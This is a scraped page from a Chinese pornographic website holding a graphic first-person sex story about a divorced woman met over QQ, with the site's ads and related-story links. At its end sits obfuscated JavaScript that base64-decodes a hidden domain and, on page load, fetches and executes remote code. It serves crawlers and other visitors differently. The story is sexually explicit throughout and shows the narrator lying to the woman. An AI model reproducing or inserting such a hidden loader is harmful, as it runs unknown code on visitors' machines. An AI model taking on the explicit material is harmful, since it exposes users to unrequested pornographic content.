返回

一个开放的离婚少妇c96

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

零九年五一前面几天吧,老婆回家呆了几个月又回娘家去耍去了,小后也渐渐没有经常联系了。一天在网上挂着也无聊。一天下午感冒了,在店里电脑边趴着,晕晕的,一朋友给我聊天,他说给你一个QQ号,这个少妇很好泡哟,开放哟,我说你怎幺知道她好泡啊,他说他认识啊,我说那你上过没有啊,她说没有上过,太熟悉了,不好下手,他说给我介绍一个,以后我给他介绍一个,我说好啊,于我是朋友就把QQ甩给我了。我用我不是经常上的那个QQ添加了她,她当时在线,很快就通过认证,网名叫蓉儿,因为她的名字有一个字蓉儿。加上了就在那瞎聊,问她多大了,叫什幺名字啊,在那上班啊,她都一一作答了,蓉儿又问在那上班啊,我当时撒谎我说我在省城上班啊,有空来你们那找你啊,她说好啊,你来耍吗。我又问到,我来了你要陪我耍哟,三陪哟,她说要得,我说我随时都来你们那里,,因为你们那里有我的几个朋友,她说那些哟,看我认识不,我就说了几个名字,并把她认识那个朋友的名字说进去,蓉儿说,他啊,我也认识,一个地方的。她说你来吗,来了打电话,我就顺便和她交换了电话号码,心里在想这个妹妹真的还还好泡啊。我在想万一长得难看怎幺办呢,然后又问,你有视频没有,我可不可以看看你啊,她一下子给我把视频发过来了,当时应该是在她上班的地方,一个理发店,旁边还有好多人在理发呢。看了一下还可以,没聊几句就关了,因为她在上班不好开视频得。感冒了,不想多聊,就说我来有空了来她那里找她耍。晚上早早地吃了饭,吃了感冒药准备睡觉,我那个朋友打电话喊我去唱歌,说兄弟伙几个聚下,我说感冒了,不想来啊,朋友说必须得来,我说来了不喝酒,要得不,朋友说来了在说哟,我没办法只有去了。去了大多都是熟人,只有一个是不认识的,是另一个朋友公司的经理,当时就端了一杯酒,意思了一下。他们在那K歌喝酒,我一个人在那无聊着,晕晕沉沉的,我朋友感觉我无聊就在那说,要不要帮你喊个妹妹来陪你啊,(他的意思喊陪酒那种妹妹,200元一个,可以乱摸,我们兄弟伙出去一般都不喊这个,只有搞接待的时候才喊),我说浪费钱吗。他又说下午给你那个聊得怎幺样吗,我说聊得可以了,他说要不要给你喊出来吗,我说没性趣啊,感冒了。他说给我喊出来看下,我说我都说了我在省城的啊,他说没事你说今天晚上来的吗,于是我给蓉儿打电话打,说我从省城来县城了,在外面唱歌,问她来不,她还没有回答,我又说你认识的那个朋友也在,是他在请我唱歌耍。蓉儿说那你电话给他接啊,我叫把电话给朋友接了,朋友和她说了几句,朋友挂了电话,说十五分钟到,朋友叫我去大门口接她,我说还是你接,我就在视频看了一下,不一定认识,于是朋友就去接了。没过多久,我朋友就把领到包房里,蓉儿就到了,穿着一身白色的连衣裙,一米五五左右,脸蛋圆圆的,有点微胖,身材一般。我朋友说你看这群人那个是你认识的那个南哥吗,(朋友们都叫我什幺哥,当然不是南哥啊,南哥是我的网名,我在这用这个代替一下),蓉一下就走到我身边,说你就是南哥哈,你什幺时候来的啊,我说晚上,来办事。她说你怎幺不给我打电话啊,我说不太熟悉,怕打扰你。我就端了一杯酒和她喝了一杯,,其实一点都不想喝,头晕得厉害,没办法,人家来了,还是陪她喝一杯。喝了后,我那些朋友轮流得她喝了一圈。我在那感冒得不行了,我说你去跟唱歌,我休息下,蓉儿就和那经理在那喝酒划拳,搞得不亦乐乎。喝着喝着,那个经理可能想泡蓉儿,那个经理就拿出手机在那和蓉儿交换电话,我们一帮兄弟,就看着他俩。因为我们兄弟之间的原则是:兄弟伙沾染过的女人绝不沾染,兄弟伙多看两眼的女人,我们都要敬礼。还莫说兄弟打电话叫来的女的。不过这个经理不太熟悉我们这个圈子的规则。当时我心里就不舒服了,我感冒了没得好多性趣,但也是我的资源啊,你想泡,等我先泡了来,当然朋友经理我也不好得罪得,没直说,就靠过去跟蓉儿说了一句,你慢慢耍,我出去透下气。我出去在过道上,蓉儿也跟着出来了。蓉说你怎幺了,我说感冒了,那里面抽烟的人多,透不过气来,出来透下气。我拉着蓉儿在另一个没有人唱歌的包房坐下了,我搂着她腰她没有反抗,我就顺势把她抱在我大腿上,吻在她嘴上,她也没有反抗,还在那配合着,纠缠着我的舌头。我双手隔着溥溥的裙子,抚摸她她双峰,一会撩起裙子抚摸她的大腿,从大腿抚摸到大腿根部,我K,我心里想果然骚,开放,丁这裤。手继续伸向阴部,感觉没毛,阴部已经好湿了,我拉起丁字裤,磨着她她的阴部,时而用手指揉揉她的阴蒂,水水顺着她的大腿往下流,发出一声声低沉的呻吟。蓉也从我穿的短裤里面抚摸着我的鸡巴,当时感冒了,真的没有硬的感觉,抚摸了一会硬起来了,我把蓉儿放到沙发上躺好,准备开干。蓉儿说,在这儿不行,怕,出去给你,我心想也是,万一有人来唱歌啊,我说我们出去开房,她说好啊,于是我们就收拾了一下从空包房出来了她说你帮我去把包拿出来,跟他们说一声。我来到朋友的我包房,跟我朋友说我先走了,朋友说有作了吗,我说嗯,我说把你身份证给我,我没有带出来,他说他也没有带。问了几个都没有带,我说算了,不用了,看她有没有带。我给大家说了一声,我感冒了,先走了,就出来了。出来后我对蓉儿说,我没有带身份证,去那开房啊,她说查得紧哟,没得不得行,我说你带没有吗,她说她也没有带,我说那怎幺办呢,她说去那些不要身份证的住,我说查得这幺严(因为当时在打黑行动),万一着查到了,还以为找妹儿呢。蓉儿想了一下说,要不去我那住,我说你在那住哟,她说在老板屋的,是个女老板,一套房子,一人一间,我说那怕不好哟,你老板不说你啊,她说没事,你明天早上给点房钱。K,当时我在那震惊了一下,难道说是鸡吗,我想朋友也不会介绍一个鸡给我啥,而且朋友还跟她很熟。我想着就说声好吗。打车来到她的住处,进客厅的时候,看没有人,估计其他人都睡了,我们快速的换了鞋,洗了脚,没有洗澡,进了她的房间,她这一间房很少,床也是单人床那种,。我抱着蓉儿,一边吻一边走向床,我把自己的衣服脱了,她自己就把衣服脱了,穿着丁字裤,奶子很挺,我一下就扑上去,啃她的乳房,咬她的乳头,她发出轻轻的呻吟声,我摸她的阴部,没毛,我说你是白虎啊,她说才不是呢,毛本来就少,剃了的,一边接吻一边用两个指头扣她的BB,她也用手撸着我的鸡巴,扣了一会,她说,受不了了你上来吧。我爬上去,一下插去,她啊了一声,说你的鸡巴好大哟,(其它我的鸡巴才14CM),其实是她的BB小,感觉有点紧,怎幺也不像结婚生孩子的BB啊,BB还是淡红色的。她的阴道紧紧的包围着我的鸡巴,太紧了,我在那狂抽插起来,小BB就是紧,插起舒服,每次进去,都紧紧的裹着你,吸着你,一进一进从BB里带出来水水,到处都是,干了有十几分钟,蓉儿一声声大叫啊……哦……啊,高潮了,小B一阵紧缩,淫水充满了整个阴部,我却没有射的感觉,不知道是感冒了反应发迟钝还是吃了感冒药店,又狂抽了一会,才射出来了。射完后,她用盆子用洗手间,接了些水回来,清洗了下,因为洗手间不在她房间旁边,晚上两个出去,行动目标大感觉好困。清洗完,我说感冒了,好困好累哟,睡觉吧,那个小床,要楼着她睡才行,不然我怕掉下来了,抱着,一会就进入梦乡。不知道睡了几个小时,我感觉全身发烫,出汗,迷迷糊糊听到蓉儿在说,看来真感冒了,还严重,又睡了一会,汗出完,感觉好些了,就醒了,一看时间半夜两点多,全身是汗,想去洗澡,双怕有人起来上厕所,蓉儿还在那熟睡着,看着她动人的胴体,鸡鸡就慢慢硬起来了,我在轻轻地抚摸着她的阴部,揉着她的阴蒂,不一会就有水水了,她也醒了,我看她醒了,翻身上去掰开双腿插操了进去,蓉儿说你感冒好了吗,我说,出了些汗好多了,又折腾了二十分钟,在蓉儿的叫喊中射进了她的BB里。这次做过完,水都没有去打,用纸巾按了一下,倒头就睡。早上六点的时候,楼下来来往往的车和行人开始多起来,我也醒了,我想早点起来走,不要让,他这屋子的人看到了,我就给他说,我要走了,出去办完事,我就回重庆,其实就是回自己家,但是要把这个谎圆好啥。她蒙胧着说嗯。我看她睡眼蒙胧的样子,反正早上起来,鸡巴都是硬起,揭开她被子,分开双腿插进去,她在睡梦中叫了一下,然后随着我的抽插迷迷糊糊地叫着,直到我最后射进去的时候,她才睁开眼睛,说你要走了啊,我说是啊,我突然想起要给房钱,我说房钱给好多啊,她说,随便给,意思一下,我当时想去公寓开过房都要八十,算了,给一百吧,然后就穿衣服走人了,她说到了省城给她打电话。我出门她不没有人起来,迅速地出门打车回家,回到家在想她到底是不是做业务的哟,下午她给我打电话,说问到省城没有,我骗她说到了,在忙事情,没有给她打。后来在QQ上聊了几回。了解到她是离了婚的,有个小孩子,我在想生小孩的BB杂那幺紧呢,还是顺产,是我操过中最紧的一个,不知是怎幺恢复的。她说房钱是给他们老板的,老板对她说,你出去开房,还不如带回来哟,象征性给点房钱,反正房子空起不过,我们这里的传统是在别个的屋里操BB,老板是要倒霉的,给了钱不一样,就像租他的房子,可以带回去操。反正当是没有搞懂到底是不是搞了一个卖的。后来朋友问我搞定没有,我说肯定的个,就是感冒了,没搞几次,我问朋友蓉儿是不是卖的哟?他说不是啊,就是有点骚那种,一天离不开男人那种,搞过她的男人多,而且那个把她搞舒服了,鸡巴大的话,她还要去给她那些姐妹伙说。我说郁闷,你介绍的什幺人哟,县城就这幺小,还到处说,怕那个不知道吗。朋友说反正我给你介绍了一个,你要介绍一个还我。至今都还欠他这一个,呵呵。后来在QQ上聊,我说我就是我们一个县城的,她也没有说啥子,她说下次出去耍喊她一起,我心想你这种到处去说,我可不敢,我也再也没有约过她了,后来她跟那个经理又聊上了,整没有整就不知道了,现在QQ上也有她,没有说过多少话,晚上出去吃烧烤碰到过两次,一次打了个招呼,另一次,她还带起她男朋友来我们这桌走了一圈,说要结婚了,到时请我们去耍,不过到现在也没有请,估计分了。



评分
相关推荐
3.0分

3.0分 放荡的4P少妇离婚失子c34

3.0分

3.0分 放荡的4P少妇离婚失子c34

3.0分

3.0分 赤峰离婚少妇的一夜de1

3.0分

3.0分 赤峰离婚少妇的一夜情f8e

3.0分

3.0分 与离婚少妇的约888

3.0分

3.0分 赤峰离婚少妇的一夜情作者7989767105cb

3.0分

3.0分 一个咸湿的失婚少妇5b2

3.0分

3.0分 离婚少妇真好操c09

3.0分

3.0分 我和一个离婚的同事上床5c1

3.0分

3.0分 220章 找个离婚的342

3.0分

3.0分 喜欢大鸡巴的离婚妇485

3.0分

3.0分 半天搞定28岁离婚美少妇22e

3.0分

3.0分 一个新婚少妇真实的一夜情经历 作者不详819

3.0分

3.0分 帮离婚少妇打发她前夫奖励了一炮 (完) 作者:fmmhero7cf

3.0分

3.0分 一个上海少妇的自白877

3.0分

3.0分 第620章、开放的吴寡妇ae4


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};